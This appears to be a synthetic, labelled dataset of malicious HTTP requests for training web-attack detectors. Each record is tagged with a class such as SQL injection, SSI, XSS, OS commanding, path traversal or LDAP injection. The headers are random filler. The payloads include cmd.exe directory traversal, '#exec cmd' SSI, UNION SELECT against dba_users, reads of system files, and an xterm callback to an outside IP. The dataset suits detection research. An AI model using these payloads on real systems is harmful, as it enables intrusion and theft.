If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6
MIME-Version: 5.2
Pragma: tc90ZoiY=aiUncnum
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 4sexi cs9e=nrrbsKhu
Range: 5-3896,18685-499682,-36
Referer: /pedcrgei/3attsq/ilivtu.tiff
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: hPkyusVlkL http://www.lutr.uk
UA-CPU: x86
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: gzip
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38389
Start - Id: 42944
class: OsCommanding
GET /0ExIHQS5o.js?e3dhxyxm=Uikeo&ieoLtdeinmti=wbehi&6tet=olroInnparmp&oaseocng=%3Do%27&ysoSwp-efromTM0y=javxoHqey2t57fu5r&ujodsd29m=lXzWwu3dm&elbtxe=otneao0&artod6u=2 HTTP/1.0
Host: 88.214.9.122
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.1
Accept-Charset: euc-jp, x-mac-ce;q=0.3
Accept-Encoding: identity, gzip;q=0.7, deflate, identity;q=0.7
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 33.124.158.191
Cookie: jas6qh9=he ee(v(n;5wTfaAta=pMmLnbodym01e|w;3eeau1eo=a)unph-u
Cookie2: $Version="9"
Date: Sun, 12 Aug 07 18:48:09 CET
ETag: W/"wXgw0djadFz4HZ4Q1m8"
Expect: 100-continue
From: sN6gaeds@i320.fr
If-Modified-Since: Sun, 15 Feb 09 23:49:46 UTC
If-Unmodified-Since: Mon, 24 Nov 08 02:52:36 GMT
If-Match: "W899v4h311Si3R-RiB"
If-None-Match: *
If-Range: Fri, 26 Jan 07 07:49:14 GMT
Max-Forwards: 4623
Pragma: no-cache
Authorization: Digest nonce
Referer: http://mltp.fr/4yen.mpeg
User-Agent: |/usr/openwin/bin/xterm+-display+146.194.116.1:0%00
Via: rcice/0.1 18.67.147.76, HTTP/7.9 111.12.64.12, 1.8 209.202.123.64
Transfer-Encoding: identity
Warning: 546 www.tgrptg.jpeg "ljhi5" 
X-Forwarded-For: 59.0.93.67
----: ------------------------------

null

End - Id: 42944
Start - Id: 40877
class: SSI
GET /oUpZCZXC/ddhno6nhn0/roh/tugostfse21in2aaoErl.mspx?A7EhEies9pRnb=9r&raed3r=ha%3Ce&bttper=45303640&ein8TaescEsf0l=578929&t95hvann4hnehex=daytqiemynbbd&thdtTi64euo1c6i=9&A7h5cfohKtei=557252104&dsre=%3C%21--++++%23odbc+++statement%3D%22select+++ntiEt%2C+++desKo%2C+doukag++from+rq88es0YBj++++order+++++by++3%2C+++21%2C++++9%22+--%3E&tchtlwey9txn=taPrrtknnE5hreoU&gaiframeerqorNP0=etr+t%7Enhtpassi6%7Ce%5Bwjwindow.openxp_&cemr=c56I.JrzwnHC&wti1Tm77ccAe=3-0+ HTTP/1.1
Host: 47.105.163.172
Connection: qmEa
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, deflate, identity;q=0.5
Accept-Language: Sr-ZnI;q=0.4, lRe1-ytaLmy, puif-t3i
Cache-Control: no-transform
Client-ip: 87.173.177.252
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="63"
Date: Sat, 22 Apr 06 02:37:24 GMT
ETag: "nd2zE-jKRmzyRPpZ@xss"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 06 Nov 08 12:57:50 GMT
If-Unmodified-Since: Sat, 05 Feb 05 12:40:12 UTC
If-Match: *
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: "MQ86-NJx_XcdWl6"
Max-Forwards: 619
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 1-,-16972,856295-5
Referer: http://tAw6dm.net/jeaHii/nEaa0d/ttwBstew/wttGfege/shiqsne.sh
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: aeibhiar (nEDdDUiWJK; iLKt2CG@O; sRS6Zu; mToi3fIw; nq6ar8l)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/3.5 212.113.104.246, 2.0 www.anteetit.css, 7.6 34.169.57.124
Transfer-Encoding: onHp; nHtsod=ceaii
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40877
Start - Id: 39902
class: SSI
GET /.jg6Hxp_/c4M5/dtnheert0e/arenime/8e3-X2DmCt/dL.dll? HTTP/1.0
Host: www.tiooto.net
Connection: keep-alive
Accept: video/quicktime, audio/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, identity, deflate, compress, gzip;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-store
Cookie: he=<!   #<!--#exec cmd="id"-->;t4l5pPo=TRap2aauesa;(;hmaworf=73;swNZ=iom
Date: Mon, 12 Oct 09 05:09:43 CET
ETag: "nP9DxkYaKIBTef9"
If-Unmodified-Since: Fri, 18 Jan 08 10:55:36 CET
If-Range: "4dYODhB0.Av1fWJKYG"
Max-Forwards: 3739
Authorization: Digest nonce
Referer: /reEnas/ao4d/aimboa1/38xe2/eiasujs.php3
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 8.5; DN-oB; rv:0.4.9) Gecko/66843001
Via: 3.9 211.50.55.98, 3sw4/8.1 www.nrmeee.jpeg:2
Transfer-Encoding: deflate

null

End - Id: 39902
Start - Id: 35007
class: SSI
GET /lattkqicuo/ergTnLoiyroesn4am/oMS0E5asCT/0MnBI1zqW_/pmvJI0Ja7vY7diPGbx/3xmlc/gj/4JPHKP-Lboot.iniL/SSlqW/svci/nHSjhenstfi/gfGFL.exe?0da=Slpassthruotdpassthru+sgoc&4aa=6&hdtcmnbdxe8tU=sj6rY57_RzB8&L@YcH=scn&hees=nyBl&swhvntL=e8M3XUVcx&wuRHLiyonrjnUi=79032733&boYEtkILKQwT=%24 HTTP/1.0
Host: 205.76.54.156:02
Connection: close
Accept: application/*, video/*;q=0.0, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Date: Mon, 27 Jul 09 08:13:14 GMT
Expect: sad9sn5
Max-Forwards: 72
Referer: http://www.wNaht.st/RgRaty/hyss2/vitn/eilmst/getw3.asp
TE: chunked
User-Agent: <!-- #odbc statement    =   "select entr,   rlulO74g, yuEes    from aola  order    by 3,   73, 3"  -->
Via: HTTP/1.6 63.255.152.98
Warning: 872 98.9.103.161 "oehWashnkrttd6r1dnhm" 
----: -------------------------------------------

null

End - Id: 35007
Start - Id: 48085
class: XSS
GET /eslKncdxdmsan8onra/IV0N1rfAK0auexec.shtml?insd=%3Cobject+++classid%3D+%22++++clsid%3A...+%22+++codebase+%3D++%22javascript%3A%5Balert+%28%27oelik%27%29%3B%5D++%22%3E HTTP/1.1
Host: www.esoe.de:6859
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1252;q=0.9, iso-8859-7, windows-1254
Accept-Encoding: compress, gzip;q=0.9, compress;q=0.2
Accept-Language: yAsejen-eotr, 9tw-ce93D
Cache-Control: no-transform
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="02"
Date: Sun, 29 Nov 09 24:32:14 GMT
ETag: W/"d7O@30CYQD7MNCaw"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Tue, 25 Dec 07 17:05:34 GMT
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: *
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: Mon, 13 Aug 07 21:21:17 CET
Max-Forwards: 7
MIME-Version: 2.8
Pragma: 7eObe='5sx'
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: http://aEant.cz/xwof/sareos.tiff
TE: trailers
Trailer: Max-Forwards
User-Agent: e05ULbDK http://www.gnranE.com
UA-CPU: PowerPC
UA-Disp: 367,260,16
UA-OS: WinNT
UA-Pixels: 6001x2247
Via: FTP/3.9 96.5.18.94, FTP/2.2 www.aeuowt.gif
Transfer-Encoding: identity
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 178 250.228.149.199:2030 "1neeqi3e" "Sat, 26 May 07 03:25:33 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48085
Start - Id: 43679
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 43.41.69.68
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.9, us-ascii, windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 10.124.19.16
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Mon, 05 Apr 04 14:57:04 CET
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: mhknea
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Sat, 21 Apr 07 01:00:44 UTC
If-Match: *
If-None-Match: "6FUvDFJhYCwcMuLU"
If-Range: Sun, 05 Dec 04 01:14:29 GMT
Max-Forwards: 81
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="lieew"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /oNEoar9V/detiacte/x0ssUcwn/ca3i.mdb
TE: trailers,chunked
User-Agent: Mozilla/8.7 (X11; U; Open BSD i386 7.9; pd-ha; rv:1.3.6) Gecko/27561257
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: 1.2 www.vl5erceV.html:2328, 4.7 42.143.82.76, 6.1 123.225.207.170
Transfer-Encoding: deflate
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43679
Start - Id: 36030
class: PathTransversal
GET /eyutoAeaitsnhat/jl3FG0X1muxgE/jVGmN7Hef/j67cmIXi@d2LBT/h7D/qcwP3ym/l3aoumtz7e9Ed/t4tcoruySphsrhr/n8zW.VE048m-my_D.html?iorTds9Pga=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&osi=2309618&cAigt4nehmqhttf=zy&fE2@qobjectBkx=32082778&scYtcyfttrs1=nirriStp8iss2Cseuh&t1n9g=%25binotthtt+dnNst&i4y-6Swu=65895&oinputWSAR7=oLF&iiuI=gbin&qifto6=3 HTTP/1.1
Host: 243.99.208.183
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: aidofr-soe1moi
Cache-Control: no-transform
Client-ip: 96.60.156.195
Cookie: HdN=ha
Cookie2: $Version="228"
Date: Sat, 17 Apr 04 18:36:43 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: hsmda3Ro@7c85h.biz
If-Modified-Since: Fri, 09 Nov 07 22:12:47 UTC
If-Unmodified-Since: Sat, 15 Apr 06 24:16:58 UTC
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: "dH9H.DIJE9oxAbgdUuh"
If-Range: Wed, 27 Jan 10 13:59:46 GMT
Max-Forwards: 26
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: Digest response="F3D851Dfd336Af39da99DEaF5dBB2eE4"
Authorization: Basic TDNtSWNpOlFlaHNt
Range: -05066,-92,-024075
Referer: http://www.nnyhes0.fr/emD3rNe/t9snhed.jpeg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 0.4; nE-8L; rv:3.2.7) Gecko/64646889
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: oihtt; 4hlW=niuus
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 213.226.164.18
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36030
Start - Id: 42106
class: SqlInjection
GET /NeBcaq9HDH/formLNU9P7_/je/4wpnn/UtS/kSCPAebHQL/jiaysnOsd9hsdIrTS/DAeCXCfa@/eoo27pyal0dhnR8sNnT/v_kwb7EbqacGZshW15/yduMwwRKBHiK1E5x8al.jpg?hzA0zmdaitndb=4d2dc%3D%26w&aemu97waee=%27+++++OR++%27HTdrond%27++++LIKE+%27aze%2525&or2Eien=is%5D8e4+tiEardiv%24+igr+&onpdr4ensaose=looileyjoxrfpwn&aiTNeridfHaGulk=9180881 HTTP/1.0
Host: 35.58.94.203
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: eL0rS5-fhtmrair, bhaphwa-7a, epalmmet-ae
Cache-Control: no-cache
Client-ip: 139.71.160.209
Cookie: 5dOr=868;eeunu4=Eme zwo5;hai8tnbkswg=hoaddbM d;7aueNa0eayrris=ixrlufcoeidt;los=0wCBoM
Cookie2: $Version="85"
Date: Fri, 06 Aug 04 23:01:07 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: elzgh
From: ri9it34@rxsle.fr
If-Modified-Since: Thu, 14 Oct 04 18:36:47 GMT
If-Unmodified-Since: Mon, 19 Feb 07 05:43:37 GMT
If-Match: *
If-None-Match: "U16Lr9tn@4cenoAUWfeh"
If-Range: *
Max-Forwards: 717
MIME-Version: 0.9
Pragma: lof=Tc2usg
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Basic aGZpbjplRW1sN2F0
Range: 80-3804,023297-91,09-
Referer: /Jrozt/qtrtlf/npIlbs/uptf/Ude6.gif
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.7 (X11; U; Unix 4.2; 2S-Da; rv:8.9.3) Gecko/50801821
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 291 136.225.173.99 "ihnTeaIeqrrr4vsorh" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42106
Start - Id: 36615
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.geaoeeru.com
Connection: oeit
Accept: audio/basic, text/*
Accept-Charset: x-mac-korean, windows-1252;q=0.1, x-mac-korean, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="9"
Date: Fri, 12 Jan 07 07:29:09 GMT
ETag: "3FW1P6WeZ_tcD9N"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 09 Jun 05 17:45:17 UTC
If-Unmodified-Since: Wed, 21 Sep 05 17:41:10 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 02:16:37 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest qop=auth
Range: 8050-
Referer: http://Edkse.uk/AeRisar/dtase/sAls/urdTdm.asp
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: QE75mee (iLPDjmmzoX)
UA-CPU: MIPS
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 www.a1tuteos.gif, FTP/8.5 167.177.49.173:44, 8.0 www.rctpen3.htm
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36615
Start - Id: 43200
class: OsCommanding
GET /a4ju8jfCxVfZGjtCq6e/s0oeeEizIEql/nhisk2dh9tmta/8beiywhrTlohEstprEtc.swf?o2eeoeesdde=%5Cn+++uftp++++-p++www.enritoonit.com+++%2Flast%2Fgeneonll%2Forar%2Fmensas%2Fesre%2Fse&eAdeletesZYk=unionzreidwidlitaf0&netzc=85884 HTTP/1.0
Host: 148.72.113.156
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, deflate, gzip;q=0.2, identity
Accept-Language: im-nudk;q=0.9, ha-mZ;q=0.0
Cache-Control: min-fresh=0
Client-ip: 111.24.12.133
Cookie: 8NKlog=ji;XM0h9=27;mndhiocef=105;rlmwiUzhsiel=iLJ@Z1
Cookie2: $Version="9"
Date: Sat, 10 Mar 07 03:09:57 UTC
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: QStwrm
From: eena@eaooz.de
If-Modified-Since: Thu, 23 Sep 04 17:10:51 CET
If-Unmodified-Since: Sat, 03 Jan 09 04:19:32 CET
If-Match: *
If-None-Match: "ILRIXSQ1HP8eRae@w"
If-Range: *
Max-Forwards: 4720
MIME-Version: 5.9
Pragma: lsad='tnIahtE'
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: NTLM MmJ5d2V0RTJ2bmlzbmFjcmllaWU4ZGVhdGVzQW9vc29zbnNzdHB1ZGg=
Range: 704-945122,63-330705
Referer: http://nNstzpe.uk/mpabase/csAiN.cgi
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: sLjKadrss http://www.jaos4hpo.be
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: lejt9o/4.4 93.84.199.150, 0.2 www.tmghee.jpg, HTTP/3.9 www.Uean.css:1
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 254 www.o7hkelz.js:8351 "etdelrar1" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43200
Start - Id: 42138
class: SqlInjection
GET /h3UDjOfI-bavfeV8/yweponbet4daqaplti/bniitveonUhse/1G1jsFXUTxL4N.WXQ/lsimbi0d.msf?qrC@PvPrv8f=bHi&o0i7eo32=kLXzpplM8Tw&7KMI=ee&zs=610403630&eopadehmtstl=5739&5oYq=ljhx%27%2F**%2FUNION%2F**%2FSELECT%2F**%2F8strtiynOd%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fe8r%2F**%2Flike%2F**%2F%27%2525 HTTP/1.0
Host: www.rnscish3pr.net:98362
Connection: AreoohXl
Accept: image/png;q=0.0, video/*;q=0.9
Accept-Charset: cp-932;q=0.8, x-mac-korean;q=0.2, windows-1255
Accept-Encoding: 
Accept-Language: iDn-HZeI6sh;q=0.2, baje-r;q=0.1, thsgEb-itdamwa6, gctxcwh-Dm;q=0.1, 2-Iotle;q=0.9
Cache-Control: only-if-cached
Client-ip: 114.28.0.8
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Wed, 20 Jan 10 23:46:53 CET
ETag: W/"1gP-UfkTE-omaDvF6d2"
Expect: 100-continue
From: yaieolw@dAieet.st
If-Modified-Since: Sat, 08 Aug 09 15:00:10 UTC
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "uMVGvqYIw@j28IV1"
If-None-Match: *
If-Range: Sat, 26 Sep 09 22:42:56 CET
Max-Forwards: 17
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Ezaest 9Tliy=nalut
Range: 80-3804,023297-91,09-
Referer: /yeerooo6/ssgu5i/slshdr.htm
TE: trailers
Trailer: From
User-Agent: oG1opigz_ http://www.ihtirete.uk
UA-CPU: StrongARM
UA-Disp: 988,870,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: HTTP/1.9 84.120.40.149, enT8/2.0 www.es3cro.gif
Transfer-Encoding: compress
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42138
Start - Id: 42314
class: SqlInjection
GET /Ehcwrkfpa/oMxS/FH/racte/k2ef/oNdDZwf9DxhhliggaEKj/pKmtTld/m4zHSv8lVwG.Fw-MfLv-/y4nmoytmbohto/open3kDsK/cypN8yY2PYhjdEVeR9.tiff?aesufu=chairs%27+++++UN%2F**%2FION++SEL%2F**%2FECT+++++betdtwz+FROM++++dba_users++++WHERE+++++45svshbe+++++like++%27%2525&sSrfd=4318&eh=54102&etieawfa=236858&cchhtpass=9690358759&tBtCbT75Wdk7=pwZ2hdYRB&dinomr8yott=hsfvard%28ens&x9NnlsJk0g9T=in&tdddmdr=Nr5&r6cpujr5ci=326376&asmhetow6aa=dAepanm HTTP/1.1
Host: 252.113.159.115:80
Connection: ee4u
Accept: */*;q=0.4
Accept-Charset: big5, cp-950;q=0.2, iso-8859-7
Accept-Encoding: 
Accept-Language: p-aiho;q=0.4, ni6e-mzstos;q=0.7, c-lef;q=0.0, jscAlv-oaeul;q=0.9, zRth-Lrnr
Cache-Control: no-store
Client-ip: 50.218.71.30
Cookie: is2qnrniENrlSl=egrneseattd6rrmayl;QdK@=tntphbk;euIn2MseohiTse=rr7n;LOperl-=l38ZPBwvoc;salmD8ce1tbado=e ws@efyet@Odpasswd
Cookie2: $Version="954"
Date: Tue, 26 Dec 06 23:33:09 GMT
ETag: "3b.fk.WCMYAXJiT2"
Expect: 100-continue
From: h5dt@dgwd.cz
If-Modified-Since: Sun, 25 Sep 05 06:28:58 CET
If-Unmodified-Since: Thu, 20 Jul 06 18:19:51 CET
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 26 May 06 01:59:13 GMT
Max-Forwards: 1
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: lllo ni4wt=cetnna
Range: -9419
Referer: http://o7ea.uk/jrhpnnc.jpg
TE: deflate
Trailer: Accept-Encoding
User-Agent: ormHbdlne (juEMvt)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4371x6437
Via: 4.2 55.207.170.82, 4.0 188.152.14.120
Transfer-Encoding: identity
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42314
Start - Id: 46085
class: PathTransversal
POST /ljvra/iuRtvtnaxtOeEhrNnyr/dvbscriptKZU8bgsound_/reeoer/9zdKJPbpatiJt_cSZc0/gie/taNKD_UuH71HQczt82W5/eu2oe/aj1t8JCKDY/g5hERhmT76na/Stnd9NradRuh.jpeg? HTTP/1.0
Content-Length: 137
Content-Language: drooul,cdel,hmtG0rI
Content-Encoding: deflate
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: dHB0QWNPbmVxaTJFYU1yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jan 04 17:00:10 CET
Last-Modified: Wed, 20 May 09 03:46:04 CET
Host: 90.88.18.154
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-roman;q=0.3, koi8-r, windows-1257, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 242.237.108.67
Cookie: oesi=qI;nn=child;auhnsu=ftp\ioa8reycmPm%sdt[m@;ssib4soa=aq4t
Cookie2: $Version="7"
Date: Fri, 04 May 07 02:41:16 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Tue, 28 Dec 04 05:21:05 CET
If-Match: *
If-None-Match: "GZlug9e0KKPhF418Mqe"
If-Range: *
Max-Forwards: 77
MIME-Version: 4.9
Pragma: kkpn=xniErhr
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest realm
Referer: /ethemUa/s1sopt5/lyaau/t8Rbtwt/eRiowrh.css
TE: trailers
User-Agent: tonP/1.8.3.4
UA-CPU: x86
UA-Color: color32
UA-Pixels: 1090x096
Via: 2.8 171.97.130.37, FTP/2.7 www.naucs.gif
Transfer-Encoding: compress
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 3193493640489
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oiebdihtnno7b=twUOH578Zx&mnh=51&t9meerub=../../../../../../proc/version&rlkeiA7dfsyensa=B1ttwinntx8ee&7agjueAjrcxg=e>xhdl

End - Id: 46085
Start - Id: 37136
class: LdapInjection
GET /eloCW/tVH3rK8RhpW/zNcsv14tCyOUI_Ag/iliueTeothpudog/rfX/ncsta/tYF8lV4PeyaDZ@3/adi36Yna/T4MvT/3kGPmochaAUdbpwindow.openVphpp_.jpg?sr5=gtarj3se6x&kcEnoe3ise=31027&1apzfasDe=o+sdpn%7C%5C&olchtLTeraidxr=jlav&Eg=idm6&rhten=o_T07xE4&rR=6951737&yyIue=anBCH&iomealkAl=69&sastmgl6anfmy=%29++%28+%7C++++%28++cn%3D*o++%27brien*+%29%28mail++++%3D*o++++%27brien*+++%29+&Nio=arfmnnaninlahsel&le1E=ngbf&nitesovie=l&Mw1processing-instructionBg3F=esh5ltmtid8rwstcl&g0aSsdloun=h HTTP/1.1
Host: 15.129.85.223:94
Connection: eiroili
Accept: text/plain, application/postscript, video/*;q=0.3
Accept-Charset: euc-cn, euc-kr;q=0.1, iso-8859-5;q=0.5, isiri-3342;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: eEoqR-osah;q=0.1, osNmEAng-b, ihtgghs-oa, aaUir0-edch, Nt-n2;q=0.6
Cache-Control: min-fresh=5
Client-ip: 249.30.190.230
Cookie: sa8lOfee=3507015;ype=fsezmn9nrlAd
Cookie2: $Version="74"
Date: Mon, 24 Apr 06 12:09:13 GMT
ETag: "omsqKnISdrLKr-1_"
Expect: 7nQmw
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 31 Aug 04 05:23:42 GMT
If-Unmodified-Since: Mon, 23 Feb 04 24:25:21 UTC
If-Match: "C-yYaVmqOQ4ImMILk"
If-None-Match: "9sZm3-xP@SjbYoETlP"
If-Range: Tue, 19 Feb 08 20:31:53 UTC
Max-Forwards: 8
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: y9ce mwiri0s=oayAEdre
Range: 4-85,-36816,7445-3
Referer: http://daeqahe.net/otrCor/rmio/nreapin/nrNhoden/haelat.exe
TE: chunked,deflate;q=0.5,gzip;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 9.3; gi-Id; rv:8.7.9) Gecko/22867089
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
